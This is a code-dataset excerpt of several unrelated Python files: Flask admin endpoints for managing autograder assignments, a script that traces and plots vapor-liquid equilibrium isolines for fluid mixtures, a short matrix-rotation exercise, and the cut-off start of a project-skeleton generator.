db.session.commit()\n\n return success_response({\n 'status': 'test updated',\n 'assignment_test': assignment_test.data\n })\n\n\n@assignments.route('/tests/delete/')\n@require_admin()\n@json_response\ndef admin_assignment_tests_delete_assignment_test_id(assignment_test_id: str):\n \"\"\"\n Delete an assignment test.\n\n :param assignment_test_id:\n :return:\n \"\"\"\n\n # Pull the 
assignment test\n assignment_test = AssignmentTest.query.filter(\n AssignmentTest.id == assignment_test_id,\n ).first()\n\n # Make sure the assignment test exists\n req_assert(assignment_test is not None, message='test not found')\n\n # Verify that course the assignment test is apart of and\n # the course context match\n assert_course_context(assignment_test)\n\n # Save the test name so we can use it in the response\n test_name = assignment_test.name\n\n # Delete all the submission test results that are pointing to\n # this test\n SubmissionTestResult.query.filter(\n SubmissionTestResult.assignment_test_id == assignment_test.id,\n ).delete()\n\n # Delete the test itself\n AssignmentTest.query.filter(\n AssignmentTest.id == assignment_test_id,\n ).delete()\n\n # Commit the changes\n db.session.commit()\n\n # Pass back the status\n return success_response({\n 'status': f'{test_name} deleted',\n 'variant': 'warning',\n })\n\n\n@assignments.post('/add')\n@require_admin()\n@json_response\ndef admin_assignments_add():\n new_assignment = Assignment(\n course_id=course_context.id,\n name='New Assignment',\n description='',\n hidden=True,\n autograde_enabled=False,\n github_repo_required=course_context.github_repo_required,\n ide_enabled=True,\n theia_image=course_context.theia_default_image,\n theia_options=course_context.theia_default_options,\n release_date=datetime.now() + timedelta(weeks=1),\n due_date=datetime.now() + timedelta(weeks=2),\n grace_date=datetime.now() + timedelta(weeks=2),\n )\n db.session.add(new_assignment)\n db.session.commit()\n\n return success_response({\n 'status': 'New assignment created.',\n 'assignment': new_assignment.data,\n })\n\n\n@assignments.post(\"/save\")\n@require_admin()\n@json_endpoint(required_fields=[(\"assignment\", dict)])\ndef admin_assignments_save(assignment: dict):\n \"\"\"\n Save assignment from raw fields\n\n :param assignment:\n :return:\n \"\"\"\n logger.info(json.dumps(assignment, indent=2))\n\n # Get assignment\n assignment_id = assignment[\"id\"]\n db_assignment = Assignment.query.filter(Assignment.id == assignment_id).first()\n\n # Make sure it exists\n if db_assignment is None:\n # Create it if it doesn't exist\n db_assignment = Assignment()\n assignment[\"id\"] = rand()\n db.session.add(db_assignment)\n\n assert_course_context(db_assignment)\n\n # Update all it's fields\n for key, value in assignment.items():\n if 'date' in key and isinstance(value, str):\n value = dateparse(value.replace('T', ' ').replace('Z', ''))\n setattr(db_assignment, key, value)\n\n # Attempt to commit\n try:\n db.session.commit()\n except (IntegrityError, DataError) as e:\n # Tell frontend what error happened\n return error_response(str(e))\n\n # Return status\n return success_response(\n {\n \"status\": \"Assignment updated\",\n }\n )\n\n\n@assignments.route(\"/sync\", methods=[\"POST\"])\n@require_admin(unless_debug=True)\n@json_endpoint(required_fields=[(\"assignment\", dict)])\ndef private_assignment_sync(assignment: dict):\n \"\"\"\n Sync assignment data from the CLI. 
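The manual cascade in the delete endpoint above is deliberate: SQLAlchemy's Query.delete() issues a bulk DELETE that bypasses Python-level relationship cascades and ORM events, so dependent rows are removed explicitly before the parent, with one commit covering both. Condensed from the handler (names as in this module):

    SubmissionTestResult.query.filter(
        SubmissionTestResult.assignment_test_id == assignment_test.id,
    ).delete()              # 1. dependent rows first
    AssignmentTest.query.filter(
        AssignmentTest.id == assignment_test_id,
    ).delete()              # 2. then the parent row
    db.session.commit()     # 3. both deletes land in a single transaction
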
This should be used to create and update assignment data.\n\n body = {\n \"assignment\": {\n \"name\": \"{name}\",\n \"course\": \"CS-UY 3224\",\n \"hidden\": true,\n \"unique_code\": \"{code}\",\n \"pipeline_image\": \"registry.digitalocean.com/anubis/assignment/{code}\",\n \"date\": {\n \"release\": \"{now}\",\n \"due\": \"{week_from_now}\",\n \"grace\": \"{week_from_now}\"\n },\n \"description\": \"This is a very long description that encompasses the entire assignment\\n\",\n \"questions\": [\n {\n \"sequence\": 1,\n \"questions\": [\n {\n \"q\": \"What is 3*4?\",\n \"a\": \"12\"\n },\n {\n \"q\": \"What is 3*2\",\n \"a\": \"6\"\n }\n ]\n },\n {\n \"sequence\": 2,\n \"questions\": [\n {\n \"q\": \"What is sqrt(144)?\",\n \"a\": \"12\"\n }\n ]\n }\n ]\n }\n }\n\n response = {\n assignment : {}\n questions: {\n accepted: [ ... ]\n ignored: [ ... ]\n rejected: [ ... ]\n }\n }\n\n :return:\n \"\"\"\n\n # The course context assertion happens in the sync function\n\n # Create or update assignment\n message, success = assignment_sync(assignment)\n\n # If there was an error, pass it back\n req_assert(success, message=message, status_code=406)\n\n # Return\n return success_response(message)\n","sub_path":"api/anubis/views/admin/assignments.py","file_name":"assignments.py","file_ext":"py","file_size_in_byte":10047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"298978266","text":"from __future__ import print_function\n\n# Python imports\nimport os, json, timeit, math\n\n# Packages that can be installed via pip or conda\nimport pandas\nimport matplotlib.pyplot as plt, numpy as np\nimport matplotlib\nmpl = matplotlib\n# import plotly\n# import plotly.plotly as py\n# import plotly.graph_objs as go\n\n# The pybind11 wrapper module \nimport VLEIsoTracer as vle\nprint('VLEIsoTracer is located at:', vle.__file__)\n\nplt.style.use('classic')\nif os.path.exists('Elsevier_journals.mplstyle'):\n plt.style.use('Elsevier_journals.mplstyle')\n\nvle.AbstractState('HEOS', '&'.join(['CO2','Ethane']))\n \n# vle.apply_simple_mixing_rule('SO2','Water','linear')\n# vle.apply_simple_mixing_rule('Methane','n-Hexane','linear')\n\ndef lowTerror(polishing):\n \"\"\"\n Plot the error in chemical potential and pressure as we trace \n along an isotherm of the phase envelope\n \"\"\"\n\n R = 8.3144598\n T = 230\n fluids = ['n-Hexane','n-Octane']\n fig, (ax1,ax2) = plt.subplots(2,1,figsize=(3.5,4),sharex= True)\n backend = 'PR'\n\n for err, ms in [[1e-3,'^-'],[1e-9,'o-']]:\n data = None\n try:\n # Build the integrator class\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n # Set flags\n tracer.set_allowable_error(err)\n tracer.polishing(polishing)\n tracer.set_debug_polishing(True)\n # Do it!\n tic = timeit.default_timer()\n tracer.trace()\n toc = timeit.default_timer()\n data = tracer.get_tracer_data()\n\n lbl = r'$\\varepsilon_{\\rm allowed}$: ' + '$10^{{{0:0.0f}}}$'.format(np.log10(err))\n # Plot the data\n x = np.array(data.x).T[0]\n perr = np.abs((np.array(data.pL) - np.array(data.pV))/np.array(data.pL))*100\n rhoL0 = np.array(data.rhoL).T[0]; rhoV0 = np.array(data.rhoV).T[0]\n chempoterr = np.abs(np.array(data.chempotr0L) - np.array(data.chempotr0V) + R*T*np.log(rhoL0/rhoV0))\n chempoterr2 = np.abs(np.array(data.chempot0L) - np.array(data.chempot0V))\n ax1.plot(x[0:-1], perr[0:-1], ms, label = lbl)\n ax2.plot(x[0:-1], chempoterr[0:-1], ms, label = lbl)\n ax2.plot(x[0:-1], chempoterr2[0:-1], ms, label = lbl)\n\n 
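    # The two residuals plotted in lowTerror are the VLE consistency conditions: both
    # phases must agree on pressure and on each chemical potential, and at fixed T the
    # ideal-gas part of the chemical-potential difference reduces to R*T*ln(rhoL0/rhoV0),
    # which is exactly the correction added to the residual terms above. A standalone
    # numpy sketch of the same arithmetic (all four input arrays are illustrative
    # stand-ins for tracer output):
    import numpy as np
    R, T = 8.3144598, 230.0                                                # J/(mol K), K
    pL, pV = np.array([1200.0, 1500.0]), np.array([1199.9, 1499.8])        # Pa, illustrative
    rhoL0, rhoV0 = np.array([7600.0, 7400.0]), np.array([0.65, 0.82])      # mol/m^3, illustrative
    mu_rL, mu_rV = np.array([-310.0, -305.0]), np.array([-290.1, -287.3])  # residual chem. pot., J/mol
    perr = np.abs((pL - pV) / pL) * 100.0                        # pressure mismatch, %
    dmu = np.abs(mu_rL - mu_rV + R * T * np.log(rhoL0 / rhoV0))  # chem.-pot. mismatch, J/mol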
except BaseException as BE:\n print(BE)\n \n # print(np.array(data.x).T[0])\n # print(np.abs((np.array(data.pL) - np.array(data.pV))/np.array(data.pL))*100)\n # print(np.abs((np.array(data.chempot0L) - np.array(data.chempot0V))/np.array(data.chempot0V))*100)\n\n print(err, len(data.pL), toc-tic)\n\n ax1.legend(loc='best')\n ax1.set_xlim(0, 1)\n ax1.set_yscale('log')\n ax2.set_yscale('log')\n ax2.set_xlabel(r'$x_{\\rm '+fluids[0]+'}$ (-)')\n ax1.set_ylabel(r'$|\\Delta p/p|\\times 100$ (%)')\n ax2.set_ylabel(r'$|\\Delta \\mu_1|$ (J/mol)')\n\n fig.tight_layout(pad=0.2)\n fig.savefig('_'.join(fluids)+'-polishing'+str(polishing)+'.pdf')\n plt.show()\n\ndef tocritline():\n \"\"\"\n Plot values (determinant of Hessian and others) along a high-temperature isotherm\n \"\"\"\n T = 300\n fluids = ['CO2','Ethane']\n\n fig, (ax1,ax2) = plt.subplots(2,1,figsize=(3.5,3.5),sharex = True)\n fig3, ax3 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n fig4, ax4 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n backend = 'HEOS'\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.trace()\n data = tracer.get_tracer_data()\n xval = np.array(data.rhoL).T[0]\n line, = ax1.plot(xval, np.abs(data.det_PSIL), label = 'liquid')\n ax1.plot(xval, np.abs(data.det_PSIV), dashes=[2,2], label='vapor')\n\n xval = np.array(data.rhoL).T[0][0:-1]\n yval = np.diff(np.array(data.rhoL).T[0])\n ax2.plot(xval, yval, 'r')\n\n rho1 = np.array(data.rhoL).T[0]\n ax3.plot(list(range(len(rho1))), rho1/np.max(rho1))\n\n ax4.plot(np.array(data.rhoL).T[0], np.array(data.rhoL).T[1])\n\n except BaseException as BE:\n print(BE)\n pass\n\n for ax in ax1,ax2:\n ax.set_xscale('log')\n ax.set_yscale('log')\n ax.set_xticks([1e-6,1e-4,1e-2,1e0,1e2,1e4])\n ax1.legend(loc='best')\n\n ax1.set_ylabel(r'$\\det(\\mathbf{H}_{\\Psi})$')\n ax2.set_ylabel(r'$h$ (mol/m$^3$)')\n ax2.set_xlabel(r\"$\\rho_1'$ (mol/m$^3$)\")\n ax1.set_yticks([1e-2,1e0,1e2,1e4,1e6,1e8])\n ax2.set_yticks([1e-8, 1e-6,1e-4,1e-2,1e0,1e2])\n\n ax3.set_xlabel(r'Step index')\n ax3.set_ylabel(r\"$\\rho_1'/{\\rm max}(\\rho_1')$ (-)\")\n ax3.set_ylim(0, 1.01)\n\n fig.tight_layout(pad=0.2)\n fig.savefig('_'.join(fluids)+'-'+str(T)+'Ktocritline.pdf')\n\n fig3.tight_layout(pad=0.2)\n fig3.savefig('_'.join(fluids)+'-'+str(T)+'Ktocritline-progress.pdf')\n\n fig4.tight_layout(pad=0.2)\n fig4.savefig('_'.join(fluids)+'-'+str(T)+'Ktocritline-debug.pdf')\n\n plt.close('all')\n\ndef CO2ethaneconcentrations():\n T = 285\n fluids = ['CO2','Ethane']\n fig4, ax4 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n backend = 'HEOS'\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n # Set flags\n tracer.set_allowable_error(1e-6)\n # tracer.polishing(polishing)\n tracer.set_debug_polishing(True)\n tracer.set_forwards_integration(True)\n tracer.set_unstable_termination(False)\n # tracer.set_stepping_variable(vle.VLEIsolineTracer.stepping_variable.STEP_IN_RHO1)\n tracer.trace()\n data = tracer.get_tracer_data()\n x = np.array(data.x).T[0]\n rhoLmat = np.array(data.rhoL)\n rhoVmat = np.array(data.rhoV)\n ax4.plot(x, rhoLmat[:,0],color='b')\n ax4.plot(x, rhoLmat[:,1],color='r')\n ax4.plot(x, rhoVmat[:,0],dashes = [2,2], color='b')\n ax4.plot(x, rhoVmat[:,1],dashes = [2,2], color='r')\n print(tracer.get_termination_reason())\n\n except BaseException as BE:\n print(BE)\n pass\n\n ax4.set_xlabel(r'x / molar')\n ax4.set_ylabel(r\"$\\rho'$,$\\rho''$ / mol/m$^3$\")\n # ax4.set_ylim(0, 
1.01)\n\n fig4.tight_layout(pad=0.2)\n fig4.savefig('_'.join(fluids)+'-'+str(T)+'conc.pdf')\n\n plt.close('all')\n\ndef MethaneEthane():\n fluids = ['Methane','Ethane']\n T = vle.Props1SI('Tcrit','Methane')-1\n fig1, ax1 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n fig4, ax4 = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n backend = 'HEOS'\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n # Set flags\n tracer.set_allowable_error(1e-6)\n # tracer.polishing(polishing)\n tracer.set_debug_polishing(True)\n tracer.set_forwards_integration(True)\n tracer.set_unstable_termination(False)\n tracer.set_stepping_variable(vle.VLEIsolineTracer.stepping_variable.STEP_IN_RHO1)\n tracer.trace()\n data = tracer.get_tracer_data()\n x = np.array(data.x).T[0]\n y = np.array(data.y).T[0]\n pL = np.array(data.pL)/1e6\n rhoLmat = np.array(data.rhoL)\n rhoVmat = np.array(data.rhoV)\n ax4.plot(x, rhoLmat[:,0],color='b')\n ax4.plot(x, rhoLmat[:,1],color='r')\n ax4.plot(x, rhoVmat[:,0],dashes = [2,2], color='b')\n ax4.plot(x, rhoVmat[:,1],dashes = [2,2], color='r')\n print(tracer.get_termination_reason())\n ax1.plot(x, pL)\n ax1.plot(y, pL)\n\n except BaseException as BE:\n print(BE)\n pass\n\n ax1.set_xlabel(r'x / molar')\n ax1.set_ylabel(r\"$p$ / MPa\")\n ax4.set_xlabel(r'x / molar')\n ax4.set_ylabel(r\"$\\rho'$,$\\rho''$ / mol/m$^3$\")\n\n fig1.tight_layout(pad=0.2)\n fig1.savefig('_'.join(fluids)+'-'+str(T)+'px.pdf')\n fig4.tight_layout(pad=0.2)\n fig4.savefig('_'.join(fluids)+'-'+str(T)+'conc.pdf')\n\n plt.close('all')\n\ndef speedtest():\n \"\"\"\n Time some results from the isoline tracing, and compare with algebraic solver\n \"\"\"\n fluids = ['CO2','Ethane'] \n fig, (ax1) = plt.subplots(1,1,figsize=(3.5,2.5),sharex = True)\n\n lib = []\n for T in np.arange(260, 304):\n time_trace = np.nan; alg_fail = True; time_alg = np.nan\n print('--')\n for backend in ['HEOS']:\n for polishing in [False, True]:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_allowable_error(1e-4)\n tracer.polishing(polishing)\n try:\n tracer.trace()\n data = tracer.get_tracer_data()\n\n print(backend, T, polishing, len(data.pL), tracer.get_tracing_time(), tracer.get_termination_reason())\n\n if backend == 'HEOS' and polishing:\n time_trace = tracer.get_tracing_time()\n\n xx = np.array(data.x).T\n yy = np.array(data.y).T\n\n AS = vle.AbstractState('HEOS', 'CO2&Ethane')\n tic = timeit.default_timer()\n bad = 0\n for i in range(xx.shape[1]):\n AS.set_mole_fractions(xx[:,1])\n try:\n AS.update(vle.QT_INPUTS, 0, T)\n except:\n bad +=1\n toc = timeit.default_timer()\n print(T, 'FLSH-HEOS', toc-tic, len(data.pL), bad)\n\n # \"Trace\" with the algebraic solver\n rhoL = data.rhoL[0]; rhoV = data.rhoV[0]\n rhostart = data.rhoL[0][0]; rhoend = data.rhoL[-1][0]\n for el in rhoV: rhoL.append(el)\n alg_tracer = vle.AlgebraicIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n alg_tracer.logging = True\n try:\n tic = timeit.default_timer()\n alg_tracer.trace_rho0(rhoL, np.linspace(rhostart, rhoend, 100))\n toc = timeit.default_timer()\n alg_fail = False\n time_alg = toc-tic\n except BaseException as BE:\n pass\n print(T, 'ALG', toc-tic, len(alg_tracer.p))\n\n except BaseException as BE:\n print(BE)\n pass\n lib.append(dict(Temp=T, time_alg=time_alg, time_trace = time_trace, alg_fail = alg_fail))\n df = pandas.DataFrame(lib)\n plt.plot(df.Temp, df.time_trace, 'ko', ms = 5, label = 
'Isochoric tracer')\n plt.plot(df.Temp, df.time_alg, 'b^', ms = 5, label = 'Algebraic tracer')\n for index, row in df.iterrows():\n if row.alg_fail:\n plt.plot(row.Temp, row.time_trace, 'rx', ms = 12, lw = 3)\n else:\n # plt.plot(row.T, row.time_trace, '')\n pass\n plt.yscale('log')\n plt.legend(loc='best', numpoints = 1)\n plt.gca().yaxis.set_major_formatter(matplotlib.ticker.ScalarFormatter())\n plt.xlabel('$T$ (K)')\n plt.ylabel('$t$ (s)')\n fig.tight_layout(pad=0.2)\n plt.savefig('speedtest.pdf')\n plt.close()\n\ndef lowTSO2Water():\n T = 400\n fluids = ['SO2','Water']\n fig, ax = plt.subplots(1,1,figsize=(3.5,2.2))\n lbls = {'PR':'Peng-Robinson','HEOS':'Multi-fluid'}\n lw = {'PR':0,'HEOS':0}\n\n for backend in ['HEOS']:\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_forwards_integration(True)\n tracer.set_unstable_termination(False)\n tracer.set_stepping_variable(vle.VLEIsolineTracer.stepping_variable.STEP_IN_RHO1)\n if backend == 'HEOS':\n AS = tracer.get_AbstractState_pointer() \n for k,v in zip(['betaT','gammaT','betaV','gammaV'],[1.019562, 0.916311, 1.094032, 0.962547]):\n AS.set_binary_interaction_double(0,1,k,v)\n tracer.trace()\n reason = tracer.get_termination_reason()\n if reason: \n print(reason)\n data = tracer.get_tracer_data()\n\n # AS = tracer.get_AbstractState_pointer()\n # for x0 in np.arange(0.3, 0.6, 0.025):\n # AS.set_mole_fractions([x0,1-x0])\n # pts = AS.all_critical_points()\n # for pt in pts:\n # print(x0, pt.T, pt.p/1e6, pt.rhomolar)\n # plt.plot(x0, pt.p/1e6,'o')\n col = mpl.cm.jet\n cpmax = np.max(np.array(data.chempot0L))\n cpmin = np.min(np.array(data.chempot0L))\n\n # p-x plot\n stable_mask = np.array(data.det_PSIL).T > 0\n for mask, marker in zip([stable_mask, ~stable_mask],['o', '*']):\n chempot = np.array(data.chempot0L)[mask]\n color = (chempot-cpmin)/(cpmax-cpmin)\n # print(color)\n x = 1-np.array(data.x).T[0][mask]\n y = (np.array(data.pL)/1e6)[mask]\n c = chempot\n line = ax.scatter(x, y, label = lbls[backend], c = color, cmap = plt.cm.jet, edgecolor = 'w')\n ax.scatter(1-np.array(data.y).T[0][mask], (np.array(data.pL)/1e6)[mask], lw = lw[backend], c = color, cmap = plt.cm.jet, edgecolor = 'w')\n\n except BaseException as BE:\n print(BE)\n raise\n\n ax.set_xlim(0, 1)\n # ax.set_yscale('log')\n ax.legend(loc='best')\n ax.set_xlabel(r'$x_{\\rm CO_{2}}$ (-)')\n ax.set_ylabel('$p$ (MPa)')\n\n fig.tight_layout(pad=0.2)\n fig.savefig('_'.join(fluids)+'-'+str(T)+'K.pdf')\n plt.show()\n\ndef calc_crits(backend, fluids, force = False):\n fname = backend + '-'.join(fluids)\n if not os.path.exists(fname) or force:\n print('rebuilding critical line')\n x, pc, Tc = [], [], []\n for x0 in np.linspace(1e-5, 1-1e-5, 101):\n AS = vle.AbstractState(backend, '&'.join(fluids))\n AS.set_mole_fractions([x0, 1-x0])\n try:\n pts = AS.all_critical_points()\n if len(pts) > 0:\n Tc.append(pts[0].T)\n pc.append(pts[0].p)\n x.append(x0)\n except BaseException as BE:\n print(x0, BE)\n with open(fname,'w') as fp:\n fp.write(json.dumps(dict(x = x, Tc = Tc, pc = pc, fluids = fluids, backend = backend)))\n with open(fname,'r') as fp:\n return json.load(fp)\n\ndef plot_isolines(fluids, Tvec, pvec, backend = 'HEOS', only_px = False):\n\n print(fluids)\n if only_px:\n fig, ax1 = plt.subplots(1,1,figsize=(3.5,2.5))\n else:\n fig, (ax1,ax2) = plt.subplots(1,2,figsize=(6.5,2.5))\n fig2, ax3 = plt.subplots(1,1)\n\n for T in Tvec:\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, 
T, backend, fluids)\n tracer.set_allowable_error(1e-8)\n tracer.polishing(True)\n tracer.trace()\n data = tracer.get_tracer_data()\n\n # p-x plot\n line, = ax1.plot(np.array(data.x).T[0], data.pL, label = str(T), lw = 0.5)\n ax1.plot(np.array(data.y).T[0], data.pL, color = line.get_color(), lw = 0.5)\n ax3.plot(np.array(data.x).T[0], np.array(data.rhoL), label = str(T))\n print('ISOT:', T, 'K;', len(data.pL), 'points')\n reason = tracer.get_termination_reason()\n if reason: \n print(reason)\n\n # If we didn't get to the end, see if we can do the backwards integration\n if np.max(np.array(data.x).T[0]) < 0.99:\n # Stop if the temperature is above the critical point of the pure fluid\n # In that case you cannot do the backwards calculation\n if T > vle.Props1SI('Tcrit',fluids[0]): \n continue\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_forwards_integration(False)\n tracer.trace()\n data = tracer.get_tracer_data()\n ax1.plot(np.array(data.x).T[0], data.pL, color = line.get_color(), lw = 0.5)\n ax1.plot(np.array(data.y).T[0], data.pV, color = line.get_color(), lw = 0.5)\n print('ISOT backwards',T, len(data.pL))\n except BaseException as BE:\n print(T, BE)\n\n # You could also modify this block to do a two-part integration with forwards and backwards parts\n # For my purposes this wasn't necessary\n if not only_px:\n for p in pvec:\n if p > vle.Props1SI('Pcrit', backend+'::'+fluids[1]):\n forwards = False\n else:\n forwards = True\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_P, p, backend, fluids)\n tracer.set_forwards_integration(forwards)\n tracer.trace()\n data = tracer.get_tracer_data()\n\n # T-x plot\n line, = ax2.plot(np.array(data.x).T[0], data.TL, label = '', lw = 0.5)\n ax2.plot(np.array(data.y).T[0], data.TV, color = line.get_color(), lw = 0.5)\n\n print('ISOP:', p, 'Pa;', len(data.pL),'points')\n except BaseException as BE:\n print(p, BE)\n\n # Critical line of the mixture\n crit = calc_crits(backend, fluids)\n x, Tc, pc = crit['x'],crit['Tc'],crit['pc']\n x += [1,0]\n Tc += [vle.Props1SI('Tcrit',f) for f in fluids]\n pc += [vle.Props1SI('pcrit',f) for f in fluids]\n x, Tc, pc = zip(*(sorted(zip(x, Tc, pc))))\n for lw, sty in [[1.0,'k-']]:\n ax1.plot(x, pc, sty, lw = lw)\n if not only_px: ax2.plot(x, Tc, sty, lw = lw)\n\n # plt.legend(loc='best')\n if only_px: \n axes = [ax1]\n else: \n axes = [ax1,ax2]\n for ax in axes:\n ax.set_xlim(0, 1)\n ax.set_xlabel(r'$x_{{\\rm {fld:s} }}, y_{{\\rm {fld:s} }}$ (-)'.format(fld=fluids[0]).replace(r'\\rm CO2',r'{\\rm CO_2}').replace(r'\\rm n-Hexane',r'{n-{\\rm Hexane}}') )\n\n ax1.set_yscale('log')\n ax1.set_ylabel('$p$ (Pa)')\n if not only_px: ax2.set_ylabel('$T$ (K)')\n\n if backend == 'PR' and fluids == ['Methane','n-Propane']:\n ax.set_ylim(ymin=1e6, ymax=1.5e7)\n\n if 'CO2' in fluids[0]:\n print('setting labels')\n ticks = [1e6,2e6,4e6,6e6,8e6,1e7]\n \n ax1.set_yticks(ticks)\n lbls = []\n for t in ticks:\n e = int(math.floor(math.log10(t)))\n c = int(t/10**e)\n print(c, e)\n l = r'${c:d}\\times 10^{{{e:d}}}$'.format(c=c,e=e)\n lbls.append(l)\n ax1.set_yticklabels(lbls)\n\n fig.tight_layout(pad=0.2)\n fig.savefig(backend+'_'.join(fluids)+'.pdf')\n plt.show()\n\ndef plotly_surface(fluids, Tvec, pvec):\n \"\"\"\n Construct a 3D set of lines forming the phase envelope \n with the tracer we developed and the use of the plotly \n plotting library\n \"\"\"\n\n backend = 'HEOS'\n \n data = []\n def add_trace(T,comp,p,linecolor):\n trace = 
go.Scatter3d(\n mode='lines',\n name=None,\n showlegend=False,\n x=T,\n y=comp,\n z=p, \n marker=dict(\n size=0,\n #color=z,\n colorscale='Viridis',\n ),\n line=dict(\n color=linecolor,\n width=5\n )\n )\n data.append(trace)\n\n for T in Tvec:\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.trace()\n _data = tracer.get_tracer_data()\n\n for comp in [np.array(_data.x).T[0].tolist(),\n np.array(_data.y).T[0].tolist()]:\n add_trace(_data.TL, comp, _data.pL, linecolor = '#000000')\n\n if np.max(np.array(_data.x).T[0]) < 0.99:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_T, T, backend, fluids)\n tracer.set_forwards_integration(False)\n tracer.trace()\n _data = tracer.get_tracer_data()\n for comp in [np.array(_data.x).T[0].tolist(),\n np.array(_data.y).T[0].tolist()]:\n add_trace(_data.TL, comp, _data.pL, linecolor = '#000000')\n\n except BaseException as BE:\n print(BE)\n\n for p in pvec:\n try:\n tracer = vle.VLEIsolineTracer(vle.VLEIsolineTracer.imposed_variable.IMPOSED_P, p, backend, fluids)\n tracer.trace()\n _data = tracer.get_tracer_data()\n for comp in [np.array(_data.x).T[0].tolist(),\n np.array(_data.y).T[0].tolist()]:\n add_trace(_data.TL, comp, _data.pL, linecolor = '#ff0000')\n except BaseException as BE:\n print(BE)\n\n # Critical line of the mixture\n crit = calc_crits(backend, fluids)\n x, Tc, pc = crit['x'],crit['Tc'],crit['pc']\n x += [1,0]\n Tc += [vle.Props1SI('Tcrit',f) for f in fluids]\n pc += [vle.Props1SI('pcrit',f) for f in fluids]\n x, Tc, pc = zip(*(sorted(zip(x, Tc, pc))))\n add_trace(Tc, x, pc, linecolor = '#ff00ff')\n\n layout = dict(\n width=1200,\n height=1000,\n autosize=False,\n font= {\n 'family': 'Times New Roman',\n 'size': 20,\n 'color': '#7f7f7f'\n },\n margin=dict(\n l=10,\n r=10,\n b=10,\n t=10,\n pad=4\n ),\n # title='Phase envelope',\n scene=dict(\n xaxis=dict(\n title='T (K)',\n type='linear',\n gridwidth=4,\n ),\n yaxis=dict(\n title='x, y',\n type='linear',\n gridwidth=4,\n ),\n zaxis=dict(\n title='p (Pa)',\n type='log',\n gridwidth=4,\n ),\n camera=dict(\n up=dict(\n x=0,\n y=0,\n z=1\n ),\n eye=dict(\n x=-1.7428,\n y=1.0707,\n z=0.7100,\n )\n ),\n aspectratio = dict( x=1, y=1, z=0.7 ),\n aspectmode = 'manual'\n ),\n )\n fig = dict(data=data, layout=layout)\n plotly.offline.plot(fig, filename='phase_envelope-'+'-'.join(fluids)+'.html', validate=True)\n\nif __name__=='__main__':\n vle.PropsSI('Dmolar','T',230,'Q',0,'n-Hexane')\n lowTerror(polishing = True)\n lowTerror(polishing = False)\n # lowTSO2Water()\n # speedtest()\n # plotly_surface(['CO2','Ethane'], np.arange(250, 310, 5), np.logspace(np.log10(2e6),np.log10(1e7),20))\n # plotly_surface(['n-Hexane','n-Octane'], np.arange(300, 600, 20), np.logspace(np.log10(1e4),np.log10(1e7),20))\n # CO2ethaneconcentrations()\n # MethaneEthane()\n # tocritline()\n # for fluids, Tvec, pvec, backend, only_px in [\n # # (['CO2','Ethane'], np.arange(250, 310, 5), np.logspace(np.log10(1e5),np.log10(1e8),30),'HEOS', False),\n # (['Methane','Ethane'], np.arange(150, 325, 5), np.logspace(np.log10(1e5),np.log10(1e8),30),'HEOS', True),\n # # (['n-Hexane','n-Octane'], np.linspace(300, 600, 20), np.logspace(np.log10(1e4),np.log10(1e7),20),'HEOS',False),\n # # (['Methane','n-Propane'], np.arange(200, 350, 10), np.logspace(np.log10(1e4),np.log10(1e7),30),'PR', True)\n # ]:\n # plot_isolines(fluids, Tvec, pvec, backend, only_px = 
only_px)","sub_path":"run_iso.py","file_name":"run_iso.py","file_ext":"py","file_size_in_byte":23942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35469950","text":"T=int(input())\nfor t in range(0,T):\n length=int(input())\n matrix=[[0]*length]*length\n string=[int(k) for k in input().split()]\n for i in range(0,length):\n for j in range(0,length):\n matrix[i][j]=string[i*length+j]\n n = len(matrix)\n r = list(zip(*matrix[::-1]))\n for i in range(n):\n for j in range(n):\n matrix[i][j] = r[i][j]\n\n \n \n ","sub_path":"Code/CodeRecords/2470/60618/303430.py","file_name":"303430.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"612189632","text":"#!/usr/bin/env python3\n'''\nUsage: skell [-o OPT...] DESTINATION\n\nSkell willl make a generic project base at DESTINATION\nthe last in the DESTINATION path will be the project name\n\nArguments:\n DESTINATION path/to/project/name\n\nOptions:\n -o OPT --opt=OPT build options\n\nThe most commonly used commands are:\n make make a project\n m same as make\n\n user make a project with a user class\n u same as user\n'''\n\nimport os\nimport re\nimport importlib\nimport importlib.util\nfrom docopt import docopt\nimport settings\n\n\ndef sanitize_base_dir(base_dir):\n ''' enforce good dir naming '''\n\n patt1 = re.compile('[-#%&{}\\<>*?&!\\'\":@]')\n\n split_base = os.path.split(base_dir)\n\n base_name = split_base[-1]\n\n print(base_name)\n if re.search(patt1, base_name):\n print('removing bad characters')\n clean_name = re.sub('\\s', '_', re.sub(patt1, '', base_name))\n else:\n clean_name = base_name\n\n if len(split_base) > 1:\n project_path = os.path.join(*split_base[:-1], clean_name)\n else:\n project_path = 